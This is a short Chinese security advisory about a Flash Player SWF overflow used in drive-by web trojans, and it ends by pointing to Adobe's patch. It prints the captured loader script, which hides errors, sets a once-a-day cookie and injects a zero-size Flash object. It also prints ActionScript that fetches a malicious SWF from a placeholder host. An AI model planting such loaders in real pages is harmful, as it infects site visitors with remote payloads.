FLASH網(wǎng)馬官方補(bǔ)丁
最近幾天攔截到利用Adobe Flash Player SWF文件漏洞的網(wǎng)馬,該網(wǎng)馬通過(guò)網(wǎng)頁(yè)加載一個(gè)正常的FLASH文件,再在那個(gè)FLASH文件里調(diào)用嵌入惡意構(gòu)造的FLASH文件,這時(shí)會(huì)導(dǎo)致溢出,從而可能執(zhí)行任意指令。以下為調(diào)用頁(yè)內(nèi)容:
<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write('<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>');
document.write('<param name=”allowScriptAccess” value=”sameDomain”/>');
document.write('<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('<param name=”quality” value=”high”/>');
document.write('<param name=”bgcolor” value=”#ffffff”/>');
document.write('<embed src=”http://www.XXX.cn/flash/XX.swf” src=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('</object>');
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script> 以下為正常的FLASH文件使用的腳本:
// Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop();
該惡意FLASH部分內(nèi)容如下:
建議:
廠商補(bǔ)丁: Adobe
—–
目前廠商已經(jīng)發(fā)布了升級(jí)補(bǔ)丁以修復(fù)這個(gè)安全問(wèn)題,請(qǐng)到廠商的主頁(yè)下載: http://www.adobe.com/go/getflash
相關(guān)文章
誘人視頻請(qǐng)君入甕 解析RealPlayer溢出漏洞
誘人視頻請(qǐng)君入甕 解析RealPlayer溢出漏洞...2007-01-01找出通病 通殺國(guó)內(nèi)軟件防火墻的弱點(diǎn)
找出通病 通殺國(guó)內(nèi)軟件防火墻的弱點(diǎn)...2007-01-01